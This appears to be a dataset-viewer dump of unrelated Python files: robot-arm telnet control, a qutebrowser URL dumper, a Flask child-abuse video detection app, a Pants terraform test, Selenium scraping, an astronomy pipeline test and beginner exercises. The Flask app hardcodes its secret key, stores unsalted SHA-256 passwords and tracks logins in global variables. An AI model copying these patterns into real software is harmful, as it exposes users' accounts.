print(self.telnet.read_until(b'>').decode('ascii'))
def initiate_move(self,strCmd='0 0 0 0 0 0'):
self.motor_power_on()
#time.sleep(5)
command=b'exe master\r\n'
self.telnet.write(command)
print(self.telnet.read_until(b'xyzoats').decode('ascii'))
command=strCmd.encode() + b"\r\n"
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
self.motor_power_off()
def motor_power_on(self): #kept this to power robot motors
command = b"zpow on\r\n"
self.telnet.write(command)
self.telnet.read_until(b">")
def motor_power_off(self):
command = b"zpow off\r\n"
self.telnet.write(command)
self.telnet.read_until(b">")
def reset_error(self): #Rest error
command = b'ereset\r\n'
self.telnet.write(command)
self.telnet.read_until(b">").decode("ascii")
def asCmd(self,command=None):
command=command.encode() + b'\r\n'
self.telnet.write(command)
self.telnet.read_until(b'>')
def clampExtend(self):
self.motor_power_on()
#time.sleep(1)
command=b'exe Klampe\r\n' #Runs pg goat
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
#time.sleep(1)
#self.motor_power_off()
def clampRetract(self):
self.motor_power_on()
#time.sleep(1)
command=b'exe Klampr\r\n' #Runs pg goat
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
#self.motor_power_off()
def MasterPart1(self,strCmd='0 0 0 0 0 0'):
self.motor_power_on()
#time.sleep(5)
command=b'exe redhot\r\n' #Runs pg goat
self.telnet.write(command)
self.telnet.read_until(b'xyzoats').decode('ascii')
command=strCmd.encode() + b"\r\n"
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
#self.motor_power_off()
def MasterPart2(self):
self.reset_error()
command=b'exe RHCP\r\n' #Runs pg goat
self.telnet.write(command)
self.telnet.read_until(b'>Program completed.No = 1').decode('ascii')
self.asCmd('esc')
if __name__ == "__main__":
looper=True
eng=matlab.engine.start_matlab()
FS30L = Kawasaki()
while(looper==True):#start the loop!
FS30L.connect()
FS30L.reset_error()
FS30L.abort_kill_all()
#time.sleep(1)
#startErrup=input('Start Matlab compute? Will put Ballscrew in home Pose: (y/n): ')#warn about first move
#if startErrup=='n':
# looper=False
# break#will break loop if 'she wasnt ready'
# -Kevin Heart
#https://www.youtube.com/watch?v=8Y5_Kuw1tXM
#else:
#retracts clamp to ensure clamp is put of the way, time delay added in function call
#this will turn on motor power and stay on as robot is actively looking for a shot
#and can trigger at any minute
#######NEED A GO HOME POSE TO OFFICIALLY RESET
FS30L.clampRetract()
#Calls matlab which uses arduino toolbox to generate a PWMDutyCylse until limit switch
#at front is triggered
eng.Stepper2Front(nargout=0)
#Once it has gone all the way forward pneumatic will extened allowing it to be cought, Delay added in function
FS30L.connect()
FS30L.reset_error()
FS30L.abort_kill_all()
FS30L.clampExtend()
FS30L.motor_power_off()
#starts matlabs main file to compute everything
#this also saves a global variable of drawback distance which can be accessed in Stepper2Back()
strCmd=eng.ClusterFuck(nargout=1)
eng.Stepper2Back(nargout=0)
FS30L.connect()
FS30L.reset_error()
FS30L.abort_kill_all()
#a double check so robot does not go to position undesired
#startErrup2=input('Continue? (y/n): ')
#if startErrup2=='y':
print(f'Sending "{strCmd}" to Robot')
FS30L.MasterPart1(strCmd)
time.sleep(2)
FS30L.connect()
FS30L.reset_error()
FS30L.abort_kill_all()
time.sleep(2)
#One more input, this is where image servoing would take place
# shoot=input('SHOOOOOOOOOOOOOOT!!!!!!!!!!!')
#time.sleep(1)
FS30L.clampRetract()
FS30L.connect()
FS30L.reset_error()
FS30L.abort_kill_all()
#finish moves back Home
FS30L.MasterPart2()
FS30L.motor_power_off()
#else:
# looper=False |
#!/usr/bin/env python
import os
import yaml
try:
from qutebrowser import qutebrowser, app
from qutebrowser.misc import ipc
except ImportError:
print("error: qutebrowser missing.")
exit(1)
def session_save():
"""Send config-source command to qutebrowsers ipc server."""
args = qutebrowser.get_argparser().parse_args()
app.standarddir.init(args)
socket = ipc._get_socketname(args.basedir)
ipc.send_to_running_instance(
socket, [":session-save get_urls"], args.target
)
session_save()
home = os.environ.get("HOME")
session = os.path.join(home, ".local/share/qutebrowser/sessions/get_urls.yml")
with open(session) as f:
y = yaml.load(f.read(), Loader=yaml.BaseLoader)
print(y["windows"][0]["tabs"][1]["history"][0]["url"])
for win in y["windows"]:
for tab in win["tabs"]:
url = tab["history"][0]["url"]
title = tab["history"][0]["title"]
if url.startswith("data:"):
url = title.split()[-1]
title = url
print(url, title)
|
class A:
def afun(self):
print(" I am A class Function")
class B:
def bfun(self):
print(" I am B class Function")
class C(A,B):
def cfun(self):
print(" I am C class Function")
#---------------------------------
c1 = C()
# by using c1 we can call C,A,B class Members
c1.afun()
c1.bfun()
c1.cfun()
#-------------------------
b1 = B()
# by using b1 we can call B class Members only
# b1.afun() Error
b1.bfun()
|
from theanify import Theanifiable, theanify
|
import os
import time
import shutil
import json
import hashlib
import datetime
import numpy as np
import torch
import torch.optim
import torch.utils.data
from model import add_video_db, add_report_db, Video, ReportList, DaycareCenter, Location, User
from flask_sqlalchemy import SQLAlchemy
from flask_ngrok import run_with_ngrok
from flask import Flask, url_for, redirect, render_template, request, flash
from dl_model import load_model, data_loader
from data.data_reader import read_video
video_status = {'need_check':'0', 'reported':'1', 'safe':'2'}
model_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Test Data/호준/호준model_best.E_bi_max_pool_ALL_fold_0_t2021-08-27 01:04:46.tar'
args = {
'arch': 'E_bi_max_pool',
'workers':1,
'batch-size':1,
'evalmodel':model_path,
'kfold':0,
'split':5,
'frames':5,
'lr':1e-6,
'weight_decay':1e-1
}
model = load_model(args,model_path)
daycare_center_name = '예은어린이집'
violence_threshold = 90
uncertain_threshold = 80
# 영상 저장을 위한 변수
save_video_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Web/static/saved video/'
save_violence_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Web/static/violence/'
save_uncertain_path = '/content/drive/Shareddrives/2021청년인재_고려대과정_10조/Web/static/uncertain/'
app = Flask(__name__,static_folder='static',template_folder='templates')
app.secret_key = 'super secret key'
app.config['SESSION_TYPE'] = 'filesystem'
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///child_abuse_detection_database.db'
db = SQLAlchemy(app)
run_with_ngrok(app) #starts ngrok when the app is run
def get_hashed_password(password):
h = hashlib.sha256()
h.update(password.encode('ascii'))
return h.hexdigest()
def check_email(email):
result = User.query.filter_by(email=email).all()
return True if result else False
def convert_datetime(unixtime):
"""Convert unixtime to datetime"""
date = datetime.datetime.fromtimestamp(unixtime).strftime('%Y-%m-%d %H_%M_%S')
return date
def convert_unixtime(date_time):
"""Convert datetime to unixtime"""
unixtime = datetime.datetime.strptime(date_time,'%Y-%m-%d %H_%M_%S').timestamp()
return unixtime
def check_login(email, pw):
result = User.query.filter_by(email=email, pw=pw).all()
return (False, None, None) if not result else (True, result[0].id ,result[0].loc_id)
@app.route('/index')
@app.route('/')
def home():
return render_template('index.html')
current_user = None
current_location = None
@app.route('/main',methods=['GET','POST'])
def maain():
global current_user, current_location
if request.method == 'GET':
return render_template('main.html')
else:
email = request.form['email']
password = get_hashed_password(request.form['password'])
status, current_user, current_location = check_login(email,password)
if status:
return render_template('main.html')
else:
flash("please put correct email or password")
return render_template('index.html')
@app.route('/logout')
def logout():
return render_template('index.html')
@app.route('/register',methods=['GET','POST'])
def register():
if request.method == 'GET':
return render_template('register.html')
else:
name = request.form.get('name')
password = get_hashed_password(request.form.get('password'))
email = request.form.get('email')
officenum = request.form.get('officenum')
location1 = request.form.get('locate1')
location2 = request.form.get('locate2')
department = request.form.get('dept')
ph1 = request.form.get('ph_num1')
ph2 = request.form.get('ph_num2')
ph3 = request.form.get('ph_num3')
if check_email(email):
flash('email already exists')
return render_template('register.html')
elif not (name and password and email and officenum and location1 and location2 and department and ph1 and ph2 and ph3):
flash('fill all the area')
return render_template('register.html')
else:
location_id = Location.query.filter(Location.name==location1+' '+location2).one().id
user = User(
email=email,
pw=password,
office_num=officenum,
department=department,
name=name,
ph_num1=ph1,
ph_num2=ph2,
ph_num3=ph3,
loc_id = location_id)
db.session.add(user)
db.session.commit()
flash('register finished')
return render_template('index.html')
@app.route('/video')
def video():
# get data by current_location
video_data = Video.query.filter_by(loc_id=current_location, status=video_status['need_check']).all()
data = list()
for item in video_data:
daycare_info = DaycareCenter.query.filter_by(id=item.dc_id).one()
daycare_description = "어린이집명 : {}<br>원장 : {}<br>주소 : {}<br>전화번호 : {}-{}-{}".format(daycare_info.name,daycare_info.chief_staff_name,daycare_info.address, daycare_info.ph_num1,daycare_info.ph_num2,daycare_info.ph_num3)
data.append({
"index":item.id,
"place":daycare_info.name,
"time":convert_datetime(item.detection_time),
"time_unix":item.detection_time,
"accuracy":str(item.accuracy) + ' %',
"accuracy_":item.accuracy,
"video_path":item.name,
"video_info":daycare_description
})
acc_sorted_data = sorted(data, key=lambda x: int(x['accuracy_']), reverse=True)
time_sorted_data = sorted(data, key=lambda x:int(x['time_unix']), reverse=True)
return render_template('video.html',
acc_sorted_data=acc_sorted_data,
time_sorted_data=time_sorted_data,
data_length=len(video_data),
video_info="Video Description")
@app.route('/list')
def listing():
report_data = ReportList.query.filter_by(loc_id=current_location).all()
data = list()
for item in report_data:
daycare_info = DaycareCenter.query.filter_by(id=item.dc_id).one()
video_info = Video.query.filter_by(id=item.vid_id).one()
daycare_description = "영상 정확도 : {}<br>어린이집명 : {}<br>원장 : {}<br>주소 : {}<br>전화번호 : {}-{}-{}".format(str(video_info.accuracy) + '%', daycare_info.name,daycare_info.chief_staff_name,daycare_info.address, daycare_info.ph_num1,daycare_info.ph_num2,daycare_info.ph_num3)
data.append({
"index":item.id,
"daycare":daycare_info.name,
"report_time":convert_datetime(item.time),
"time_unix":item.time,
"action_time": convert_datetime(video_info.detection_time),
"video_path": video_info.name,
"video_info":daycare_description,
"police_station":item.police_name,
"police_status":item.status
})
time_sorted_data = sorted(data, key=lambda x:int(x['time_unix']), reverse=True)
return render_template('list.html',
time_sorted_data=time_sorted_data,
data_length=len(time_sorted_data),
video_info="Video Description"
)
@app.route('/report/<video_id>')
def report_police(video_id):
police_station = ['답십리지구대', '용신지구대', '청량리파출소', '제기파출소', '전농1파출소', '전농2파출소','장안1파출소', '장안2파출소', '이문지구대', '휘경파출소', '회기파출소']
video = db.session.query(Video).get(int(video_id))
video.status = video_status['reported']
report_data = ReportList(
time = time.time() + 9 * 3600,
police_name = np.random.choice(police_station, 1)[0],
status = '출동 전',
loc_id = video.loc_id,
dc_id = video.dc_id,
vid_id = video.id
)
db.session.add(report_data)
db.session.commit()
return redirect(url_for('video'))
@app.route('/safe/<video_id>')
def safe_video(video_id):
video = db.session.query(Video).get(int(video_id))
video.status = video_status['safe']
db.session.commit()
return redirect(url_for('video'))
@app.route('/predict', methods=['POST'])
def prediction():
if request.method == 'POST':
current_time = time.time()+9*60*60
end = time.time()
file = request.files['file']
frames = file.read()
FILE_OUTPUT = daycare_center_name + '_' + str(time.strftime('%Y-%m-%d_%H_%M_%S %p', time.gmtime(current_time))) + '.mp4'
out_file = open(save_video_path + FILE_OUTPUT, "wb")
out_file.write(frames)
out_file.close()
video_path = save_video_path + FILE_OUTPUT
video = read_video(video_path)
val_loader = data_loader(args, video)
model.eval()
for i, (input) in enumerate(val_loader):
input_var = torch.autograd.Variable(input, volatile=True)
input_var = input_var.cuda()
# compute output
output_dict = model(input_var)
model_ret = output_dict['classification'].cpu().detach().numpy()[0][1] * 100
# Violence
if model_ret > violence_threshold:
print('-----------------violence detected!!!!!!----------------')
print(model_ret, '% violence detected')
shutil.copy(save_video_path+FILE_OUTPUT, save_violence_path+FILE_OUTPUT)
save_name = save_violence_path+FILE_OUTPUT.split('.')[0] + '_' + str(round(model_ret,2)) +'.mp4'
os.rename( save_violence_path+FILE_OUTPUT, save_name)
video_info = add_video_db(db, save_name, daycare_center_name, model_ret, status=1)
report_info = add_report_db(db,video_info)
# Uncertain
elif model_ret > uncertain_threshold:
print('****** uncertainty detected ******')
print(model_ret, '% violence detected')
shutil.copy(save_video_path+FILE_OUTPUT, save_uncertain_path+FILE_OUTPUT)
save_name = save_uncertain_path+FILE_OUTPUT.split('.')[0] + '_' + str(round(model_ret,2)) +'.mp4'
os.rename( save_uncertain_path+FILE_OUTPUT, save_name)
video_info = add_video_db(db, save_name,daycare_center_name, model_ret)
else:
print('violence : ', round(model_ret,2),' %, - ',FILE_OUTPUT)
os.rename(save_video_path+FILE_OUTPUT, save_video_path+FILE_OUTPUT.split('.')[0] + '_' + str(round(model_ret,2)) +'.mp4')
print('model calulation time : ',round(time.time() - end,2), ' sec')
if model_ret > violence_threshold:
return json.dumps(str(1))
else:
return json.dumps(str(0))
if __name__ == "__main__":
app.run()
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import textwrap
from typing import List, NewType
import pytest
from pants.backend.terraform import tool
from pants.backend.terraform.lint.tffmt import tffmt
from pants.backend.terraform.lint.tffmt.tffmt import TffmtRequest
from pants.backend.terraform.target_types import TerraformFieldSet, TerraformModuleTarget
from pants.backend.terraform.tool import TerraformTool
from pants.core.goals.fmt import FmtResult, Partitions
from pants.core.util_rules import external_tool, source_files
from pants.core.util_rules.external_tool import ExternalToolVersion
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.engine.addresses import Address
from pants.engine.fs import CreateDigest, Digest, DigestContents, FileContent
from pants.engine.internals.native_engine import Snapshot
from pants.engine.target import Target
from pants.testutil.rule_runner import QueryRule, RuleRunner
RuleRunnerOptions = NewType("RuleRunnerOptions", List[str])
available_tf_versions = [
ExternalToolVersion.decode(v).version for v in TerraformTool.default_known_versions
]
tf_versions = [TerraformTool.default_version, available_tf_versions[0]]
# uncomment to run against *all* terraform versions
# tf_versions = list(set(available_tf_versions))
@pytest.fixture(params=tf_versions)
def rule_runner_options(request) -> RuleRunnerOptions:
tf_version = request.param
return RuleRunnerOptions(
[
"--backend-packages=pants.backend.experimental.terraform",
"--backend-packages=pants.backend.experimental.terraform.lint.tffmt",
f"--download-terraform-version={tf_version}",
]
)
@pytest.fixture()
def rule_runner() -> RuleRunner:
return RuleRunner(
target_types=[TerraformModuleTarget],
rules=[
*external_tool.rules(),
*tffmt.rules(),
*tool.rules(),
*source_files.rules(),
QueryRule(Partitions, (TffmtRequest.PartitionRequest,)),
QueryRule(FmtResult, (TffmtRequest.Batch,)),
QueryRule(SourceFiles, (SourceFilesRequest,)),
],
)
GOOD_SOURCE = FileContent(
"good.tf",
textwrap.dedent(
"""\
locals {
foo = "xyzzy"
}
resource "test_instance" "default" {
key = "value-${local.foo}"
longer_key = "bar"
}
"""
).encode("utf-8"),
)
# The misformatted part is the `key` property in the resource block.
BAD_SOURCE = FileContent(
"bad.tf",
textwrap.dedent(
"""\
resource "test_instance" "default" {
key = "foo"
longer_key = "bar"
}
"""
).encode("utf-8"),
)
FIXED_BAD_SOURCE = FileContent(
"bad.tf",
textwrap.dedent(
"""\
resource "test_instance" "default" {
key = "foo"
longer_key = "bar"
}
"""
).encode("utf-8"),
)
def make_target(
rule_runner: RuleRunner, source_files: List[FileContent], *, target_name="target"
) -> Target:
rule_runner.write_files(
{
"BUILD": f"terraform_module(name='{target_name}')\n",
**{source_file.path: source_file.content.decode() for source_file in source_files},
}
)
return rule_runner.get_target(Address("", target_name=target_name))
def run_tffmt(
rule_runner: RuleRunner,
targets: List[Target],
options: RuleRunnerOptions,
) -> FmtResult | None:
rule_runner.set_options(options)
field_sets = [TerraformFieldSet.create(tgt) for tgt in targets]
input_sources = rule_runner.request(
SourceFiles,
[
SourceFilesRequest(field_set.sources for field_set in field_sets),
],
)
partitions = rule_runner.request(
Partitions,
[
TffmtRequest.PartitionRequest(tuple(field_sets)),
],
)
if not partitions:
return None
assert len(partitions) == 1
partition = partitions[0]
assert set(partition.elements) == set(input_sources.snapshot.files)
fmt_result = rule_runner.request(
FmtResult,
[
TffmtRequest.Batch(
"",
partition.elements,
partition_metadata=partition.metadata,
snapshot=input_sources.snapshot,
),
],
)
return fmt_result
def get_content(rule_runner: RuleRunner, digest: Digest) -> DigestContents:
return rule_runner.request(DigestContents, [digest])
def get_snapshot(rule_runner: RuleRunner, source_files: List[FileContent]) -> Snapshot:
digest = rule_runner.request(Digest, [CreateDigest(source_files)])
return rule_runner.request(Snapshot, [digest])
def test_passing_source(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
target = make_target(rule_runner, [GOOD_SOURCE])
fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
assert fmt_result
assert fmt_result.stdout == ""
assert fmt_result.output == get_snapshot(rule_runner, [GOOD_SOURCE])
assert fmt_result.did_change is False
def test_failing_source(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
target = make_target(rule_runner, [BAD_SOURCE])
fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
assert fmt_result
contents = get_content(rule_runner, fmt_result.output.digest)
print(f">>>{contents[0].content.decode()}<<<")
assert fmt_result.stderr == ""
assert fmt_result.output == get_snapshot(rule_runner, [FIXED_BAD_SOURCE])
assert fmt_result.did_change is True
def test_mixed_sources(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
target = make_target(rule_runner, [GOOD_SOURCE, BAD_SOURCE])
fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
assert fmt_result
assert fmt_result.output == get_snapshot(rule_runner, [GOOD_SOURCE, FIXED_BAD_SOURCE])
assert fmt_result.did_change is True
def test_multiple_targets(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
targets = [
make_target(rule_runner, [GOOD_SOURCE], target_name="tgt_good"),
make_target(rule_runner, [BAD_SOURCE], target_name="tgt_bad"),
]
fmt_result = run_tffmt(rule_runner, targets, rule_runner_options)
assert fmt_result
assert fmt_result.output == get_snapshot(rule_runner, [GOOD_SOURCE, FIXED_BAD_SOURCE])
assert fmt_result.did_change is True
def test_skip(rule_runner: RuleRunner, rule_runner_options: RuleRunnerOptions) -> None:
target = make_target(rule_runner, [BAD_SOURCE])
rule_runner_options.append("--terraform-fmt-skip") # skips running terraform
fmt_result = run_tffmt(rule_runner, [target], rule_runner_options)
assert fmt_result is None
|
class NotMutable( AttributeError ):
pass
def not_mutable( *a, **kw ):
raise NotMutable()
|
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
class NavigationManager():
def __init__(self, localDriverPath, chrome_options):
self.driver = webdriver.Chrome(executable_path=localDriverPath, chrome_options=chrome_options)
self.currentUrl = ''
#exception to be managed and logged
def get_start_page(self, startingUrl):
self.currentUrl = startingUrl
self.driver.get(self.currentUrl)
def check_for_next_page_existence(self):
try:
self.driver.find_element_by_xpath("//div[@id='selector']/ul/li/a[@class = 'page-link next' and contains(@href, '#page-')]")
except NoSuchElementException as exception:
return False
else:
return True
#exception to be managed and logged
def get_next_page(self, startingUrl):
self.driver.find_element_by_xpath("//div[@id='selector']/ul/li/a[@class = 'page-link next' and contains(@href, '#page-')]").click()
self.currentUrl = self.driver.current_url
def find_cases_table(self):
htmlTable = self.driver.find_element_by_id('tablePerkaraAll').get_attribute('outerHTML')
return htmlTable |
#Main python script for the VEGAS analysis pipeline
import sys
import time
from plutils import *
inst_filename = sys.argv[1]
try:
f = open(inst_filename)
except OSError:
print("Instructions file ", inst_filename, " could not be opened.")
raise
else:
f.close()
print(inst_filename)
testmod.testmod()
#Test the database functionality
print('-'*25)
print('Testing DB functionality')
tmpCD={'GLOBALCONFIG' : {'DBHOSTNAME' : 'romulus.ucsc.edu', 'DBNAME' : 'VERITAS', 'DBUSERNAME' : 'readonly'}}
dbcnx=database.DBConnection(configdict=tmpCD)
host=dbcnx.host
db=dbcnx.db
user=dbcnx.user
print('host = ', host)
print('db = ', db)
print('user = ', user)
tmp_runnum='79227'
print('Info for run ', tmp_runnum, ':')
flasher=dbcnx.get_calib_run(tmp_runnum)
ddate=dbcnx.get_ddate(tmp_runnum)
src_id=dbcnx.get_source_id(tmp_runnum)
print(' flasher run = ', flasher)
print(' ddate = ', ddate)
print(' src_id = ', src_id)
'''
#Test condor functionality
print('-'*25)
print('Testing condor functionality')
print('Attempting initalization/configuration...')
cs=condor.CondorJob(executable='sleep_test.sh', arguments='5', universe='vanilla', workingdir='/home/vhep/ssscott/tmp', log='condor_test.log', output='condor_test.out', error='condor_test.error', requirements='')
print(' status = ', cs.status)
print('Attempting submission...')
cs.submit()
print(' status = ', cs.status)
print(' job id = ', cs.jobid)
print('Waiting for test job to terminate...')
while(cs.get_status() != 'terminated'):
print(' status = ', cs.get_status())
time.sleep(1)
print('Job should have terminated...')
print(' status = ', cs.status)
print(' exit status = ', cs.exitstatus)
'''
print('-'*25)
print('Testing instructions file instreader')
read_inst = instreader.InstFileReader(inst_filename)
configdict = read_inst.get_config_dict()
print ('configdict: ', configdict)
"""
print('-'*25)
print('Testing config file configwriter')
cw = configwriter.ConfigWriter(configdict,'VASTAGE1:GRP1',1, '/home/vhep/ssscott/tmp')
cw.write('config')
cw.write('cuts')
print(' Config file: ', cw.configfilepath)
print(' Cuts file: ', cw.cutsfilepath)
"""
# Run Group Manager
print('-'*25)
print('Testing run group manager functionality')
rgm = runmanager.RunGroupManager(configdict,dbcnx)
grpdict = rgm.get_group_dict()
print(' Groupdict:')
print(' ', grpdict)
subgroup1 = 'GRP1:GRP2'
subgroup2 = 'GRP1'
print(' subgroup1: ', subgroup1)
rg1 = rgm.get_run_groups(subgroup1)
print(' ', rg1)
for grpid,rg in rg1.items():
for rid,r in rg.datarundict.items():
print(' datarun: {0} {1} {2} {3}'.format(r.runnum, r.ddate, r.calib, r.timecuts))
for rid,r in rg.calibrundict.items():
print(' calibrun: {0} {1}'.format(r.runnum, r.ddate))
rg2 =rgm.get_run_groups(subgroup2)
print(' subgroup2: ', rg2)
print(' ', rg2)
for grpid,rg in rg2.items():
for rid,r in rg.datarundict.items():
print(' datarun: {0} {1} {2} {3}'.format(r.runnum, r.ddate, r.calib, r.timecuts))
for rid,r in rg.calibrundict.items():
print(' calibrun: {0} {1}'.format(r.runnum, r.ddate))
#Analysis Testing
print('-'*25)
print('Initalizing analysis core...')
ac = analysis.AnalysisCore(configdict=configdict, runmanager=rgm)
print('Status = {0}'.format(ac.get_status()))
print('Executing...')
ac.execute()
|
# Exercício 5.26 - Livro
dividendo = int(input('Digite o dividendo: '))
divisor = int(input('Digite o divisor: '))
div = dividendo
cont = 0
while True:
div = div - divisor
cont = cont + 1
if div == 0:
resultado = cont
resto = 0
break
elif div < 0:
resultado = cont - 1
resto = div + divisor
break
print(f'Resto da divisão: {resto}')
|
age = 25
num = 0
while num < age:
if num == 0:
if num % 2 == 0:
print(num)
num+=1
|
#!/usr/bin/python3
import socket
host=''
port=5555
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.bind((host,port))
except Exception as e:
print(str(e))
s.listen()
conn,addr=s.accept()
print("connected to:", addr[0],addr[1]) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.